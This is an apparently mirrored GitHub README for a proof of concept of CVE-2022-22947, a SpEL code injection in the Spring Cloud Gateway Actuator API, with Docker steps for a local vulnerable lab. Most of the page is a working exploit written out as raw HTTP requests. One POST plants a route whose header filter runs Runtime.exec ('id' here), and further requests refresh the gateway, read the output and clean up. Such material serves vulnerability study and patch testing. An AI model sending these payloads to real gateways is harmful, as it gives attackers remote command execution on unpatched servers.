https://github.com/twseptian/cve-2022-22947

Spring Cloud Gateway Actuator API SpEL Code Injection (CVE-2022-22947)
https://github.com/twseptian/cve-2022-22947

command-injection cve-2022-22947 rce remote-code-execution spring-cloud-gateway spring-framework

Last synced: 5 months ago
JSON representation

Spring Cloud Gateway Actuator API SpEL Code Injection (CVE-2022-22947)

Host: GitHub
URL: https://github.com/twseptian/cve-2022-22947
Owner: twseptian
Created: 2022-04-15T15:41:36.000Z (about 3 years ago)
Default Branch: main
Last Pushed: 2022-04-15T15:48:07.000Z (about 3 years ago)
Last Synced: 2025-02-01T11:24:52.302Z (5 months ago)
Topics: command-injection, cve-2022-22947, rce, remote-code-execution, spring-cloud-gateway, spring-framework
Language: Dockerfile
Homepage:
Size: 26.5 MB
Stars: 11
Watchers: 2
Forks: 1
Open Issues: 0
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

README

        # Spring Cloud Gateway Actuator API SpEL Code Injection (CVE-2022-22947)

## Build

```bash

$ git clone https://github.com/twseptian/cve-2022-22947.git

$ cd cve-2022-22947

$ docker build . -t cve-2022-22947

$ docker run -p 9000:9000 --name cve-2022-22947 cve-2022-22947

```

![docker_run](screenshots/poc1.png)

![run on browser](screenshots/browser.png)

## PoC

- send the following request to add a router which contains an SpEL expression (in this case, we tried to execute `id`)

```bash

POST /actuator/gateway/routes/test123 HTTP/1.1

Host: 172.17.0.2:9000

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0

Content-Type: application/json

Content-Length: 340

{

  "id": "test123",

  "filters": [{

    "name": "AddResponseHeader",

    "args": {

      "name": "Result",

      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"

    }

  }],

  "uri": "http://example.com",

"order":0

}

```

![create route test123](screenshots/create.png)

- refresh the gateway to execute the SpEL expression

```bash

POST /actuator/gateway/refresh HTTP/1.1

Host: 172.17.0.2:9000

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0

Content-Type: application/x-www-form-urlencoded

```

![refresh application](screenshots/refresh.png)

- send the request to get `id` information

```bash

GET /actuator/gateway/routes/test123 HTTP/1.1

Host: 172.17.0.2:9000

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 

```

![get/run application](screenshots/get_test123.png)

- `DELETE` request to remove SpEL expression

```bash

DELETE /actuator/gateway/routes/test123 HTTP/1.1

Host: 172.17.0.2:9000

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Content-Type: application/x-www-form-urlencoded

```

![delete application](screenshots/del_test123.png)

- refresh the gateway

```bash

POST /actuator/gateway/refresh HTTP/1.1

Host: 172.17.0.2:9000

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0

Content-Type: application/x-www-form-urlencoded

```

![refresh application](screenshots/refresh.png)

## References:

- [CVE-2022-22947: SPEL CASTING AND EVIL BEANS](https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/)

- [BRING YOUR OWN SSRF – THE GATEWAY ACTUATOR](https://wya.pl/2021/12/20/bring-your-own-ssrf-the-gateway-actuator/)

- [Spring Cloud Gateway Actuator API SpEL Code Injection (CVE-2022-22947)](https://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22947)

- [Spring Gateway Demo](https://github.com/wdahlenburg/spring-gateway-demo)

ecosyste.ms

Data

Tools

Indexes

Applications

Experiments

Awesome

https://github.com/twseptian/cve-2022-22947

Awesome Lists containing this project

README